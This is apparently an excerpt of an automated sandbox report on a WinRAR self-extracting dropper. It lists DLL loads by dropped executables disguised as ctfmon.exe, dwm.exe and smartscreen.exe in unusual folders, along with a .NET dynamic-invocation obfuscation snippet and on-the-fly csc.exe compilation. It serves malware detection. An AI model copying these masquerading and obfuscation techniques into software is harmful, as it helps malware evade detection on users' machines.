                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: mscoree.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: apphelp.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: kernel.appcore.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: version.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: uxtheme.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: windows.storage.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: wldp.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: profapi.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: cryptsp.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: rsaenh.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: cryptbase.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: sspicli.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: mscoree.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: kernel.appcore.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: version.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: uxtheme.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: windows.storage.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: wldp.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: profapi.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: cryptsp.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: rsaenh.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: cryptbase.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: sspicli.dll
                                    Source: C:\Recovery\dwm.exeSection loaded: mscoree.dll
                                    Source: C:\Recovery\dwm.exeSection loaded: apphelp.dll
                                    Source: C:\Recovery\dwm.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Recovery\dwm.exeSection loaded: version.dll
                                    Source: C:\Recovery\dwm.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Recovery\dwm.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\dwm.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\dwm.exeSection loaded: uxtheme.dll
                                    Source: C:\Recovery\dwm.exeSection loaded: windows.storage.dll
                                    Source: C:\Recovery\dwm.exeSection loaded: wldp.dll
                                    Source: C:\Recovery\dwm.exeSection loaded: profapi.dll
                                    Source: C:\Recovery\dwm.exeSection loaded: cryptsp.dll
                                    Source: C:\Recovery\dwm.exeSection loaded: rsaenh.dll
                                    Source: C:\Recovery\dwm.exeSection loaded: cryptbase.dll
                                    Source: C:\Recovery\dwm.exeSection loaded: sspicli.dll
                                    Source: C:\Recovery\dwm.exeSection loaded: mscoree.dll
                                    Source: C:\Recovery\dwm.exeSection loaded: apphelp.dll
                                    Source: C:\Recovery\dwm.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Recovery\dwm.exeSection loaded: version.dll
                                    Source: C:\Recovery\dwm.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Recovery\dwm.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\dwm.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\dwm.exeSection loaded: uxtheme.dll
                                    Source: C:\Recovery\dwm.exeSection loaded: windows.storage.dll
                                    Source: C:\Recovery\dwm.exeSection loaded: wldp.dll
                                    Source: C:\Recovery\dwm.exeSection loaded: profapi.dll
                                    Source: C:\Recovery\dwm.exeSection loaded: cryptsp.dll
                                    Source: C:\Recovery\dwm.exeSection loaded: rsaenh.dll
                                    Source: C:\Recovery\dwm.exeSection loaded: cryptbase.dll
                                    Source: C:\Recovery\dwm.exeSection loaded: sspicli.dll
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeSection loaded: mscoree.dll
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeSection loaded: apphelp.dll
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeSection loaded: version.dll
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeSection loaded: uxtheme.dll
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeSection loaded: windows.storage.dll
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeSection loaded: wldp.dll
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeSection loaded: profapi.dll
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeSection loaded: cryptsp.dll
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeSection loaded: rsaenh.dll
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeSection loaded: cryptbase.dll
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeSection loaded: sspicli.dll
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeSection loaded: mscoree.dll
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeSection loaded: version.dll
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeSection loaded: uxtheme.dll
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeSection loaded: windows.storage.dll
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeSection loaded: wldp.dll
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeSection loaded: profapi.dll
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeSection loaded: cryptsp.dll
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeSection loaded: rsaenh.dll
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeSection loaded: cryptbase.dll
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeSection loaded: sspicli.dll
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: mscoree.dll
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: kernel.appcore.dll
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: version.dll
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: uxtheme.dll
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: windows.storage.dll
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: wldp.dll
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: profapi.dll
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: cryptsp.dll
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: rsaenh.dll
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: cryptbase.dll
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: sspicli.dll
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: mscoree.dll
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: kernel.appcore.dll
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: version.dll
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: uxtheme.dll
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: windows.storage.dll
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: wldp.dll
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: profapi.dll
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: cryptsp.dll
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: rsaenh.dll
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: cryptbase.dll
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: apphelp.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: version.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: wldp.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: profapi.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: version.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: wldp.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: profapi.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: ktmw32.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: rasapi32.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: rasman.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: rtutils.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: mswsock.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: winhttp.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: iphlpapi.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: dhcpcsvc6.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: dhcpcsvc.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: dnsapi.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: winnsi.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: rasadhlp.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: fwpuclnt.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: propsys.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: apphelp.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: dlnashext.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: wpdshext.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: edputil.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: netutils.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: windows.staterepositoryps.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: wintypes.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: appresolver.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: bcp47langs.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: slc.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: userenv.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: sppc.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: onecorecommonproxystub.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: onecoreuapcommonproxystub.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: version.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: wldp.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: profapi.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeSection loaded: sspicli.dll
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeSection loaded: mscoree.dll
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeSection loaded: version.dll
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeSection loaded: uxtheme.dll
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeSection loaded: windows.storage.dll
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeSection loaded: wldp.dll
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeSection loaded: profapi.dll
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeSection loaded: cryptsp.dll
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeSection loaded: rsaenh.dll
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeSection loaded: cryptbase.dll
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                    Source: Window RecorderWindow detected: More than 3 window changes detected
                                    Source: EjS7Q5fFCE.exeStatic file information: File size 2009852 > 1048576
                                    Source: EjS7Q5fFCE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                    Source: EjS7Q5fFCE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                    Source: EjS7Q5fFCE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                    Source: EjS7Q5fFCE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: EjS7Q5fFCE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                    Source: EjS7Q5fFCE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                    Source: EjS7Q5fFCE.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: EjS7Q5fFCE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: EjS7Q5fFCE.exe
                                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\jgewpxd5\jgewpxd5.pdb source: Portsessionsvc.exe, 00000007.00000002.2015114062.00000000034EB000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: em.pdbB4 source: smartscreen.exe, 0000002A.00000002.2142062522.000000001B68F000.00000004.00000020.00020000.00000000.sdmp
                                    Source: EjS7Q5fFCE.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                    Source: EjS7Q5fFCE.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                    Source: EjS7Q5fFCE.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                    Source: EjS7Q5fFCE.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                    Source: EjS7Q5fFCE.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                                    Data Obfuscation

                                    barindex
                                    .NET source code contains method to dynamically call methods (often used by packers)
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, gPIGJGRNbTd3Z8flbUb.cs.Net Code: Type.GetTypeFromHandle(KWUnMUxlLwAtIN2vRBh.dJOImxtdBgh(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(KWUnMUxlLwAtIN2vRBh.dJOImxtdBgh(16777245)),Type.GetTypeFromHandle(KWUnMUxlLwAtIN2vRBh.dJOImxtdBgh(16777259))})
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, gPIGJGRNbTd3Z8flbUb.cs.Net Code: Type.GetTypeFromHandle(KWUnMUxlLwAtIN2vRBh.dJOImxtdBgh(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(KWUnMUxlLwAtIN2vRBh.dJOImxtdBgh(16777245)),Type.GetTypeFromHandle(KWUnMUxlLwAtIN2vRBh.dJOImxtdBgh(16777259))})
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jgewpxd5\jgewpxd5.cmdline"
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jgewpxd5\jgewpxd5.cmdline"Jump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeFile created: C:\ComproviderComponentIntocommon\__tmp_rar_sfx_access_check_4944234Jump to behavior
                                    Source: EjS7Q5fFCE.exeStatic PE information: section name: .didat
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeCode function: 0_2_0043F640 push ecx; ret 0_2_0043F653
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeCode function: 0_2_0043EB78 push eax; ret 0_2_0043EB96
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeCode function: 7_2_00007FFD9B784B6E push ebx; retf 7_2_00007FFD9B784B74
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeCode function: 7_2_00007FFD9B783A16 push cs; retf 7_2_00007FFD9B783A17
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeCode function: 7_2_00007FFD9B7800BD pushad ; iretd 7_2_00007FFD9B7800C1
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeCode function: 7_2_00007FFD9B8E15F6 push ss; ret 7_2_00007FFD9B97F349
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeCode function: 7_2_00007FFD9B8E0FF7 push ss; ret 7_2_00007FFD9B97F349
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeCode function: 7_2_00007FFD9B8E09E5 push ss; ret 7_2_00007FFD9B97F349
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeCode function: 7_2_00007FFD9B8E0C0A push ss; ret 7_2_00007FFD9B97F349
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeCode function: 7_2_00007FFD9B8E1208 push ss; ret 7_2_00007FFD9B97F349
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeCode function: 7_2_00007FFD9B8E1C04 push ss; ret 7_2_00007FFD9B97F349
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeCode function: 7_2_00007FFD9B8E2437 push ss; ret 7_2_00007FFD9B97F349
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeCode function: 7_2_00007FFD9B8E0234 push ss; ret 7_2_00007FFD9B97F349
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeCode function: 7_2_00007FFD9B8E0F66 push ss; ret 7_2_00007FFD9B97F349
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeCode function: 7_2_00007FFD9B8E03AB push ss; ret 7_2_00007FFD9B97F349
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeCode function: 7_2_00007FFD9B8E03DB push ss; ret 7_2_00007FFD9B97F349
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeCode function: 7_2_00007FFD9B8E00F6 push ss; ret 7_2_00007FFD9B97F349
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeCode function: 7_2_00007FFD9B8E24F6 push ss; ret 7_2_00007FFD9B97F349
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeCode function: 7_2_00007FFD9B8E18E2 push ss; ret 7_2_00007FFD9B97F349
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeCode function: 7_2_00007FFD9B8E0502 push ss; ret 7_2_00007FFD9B97F349
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeCode function: 7_2_00007FFD9B8E155C push ss; ret 7_2_00007FFD9B97F349
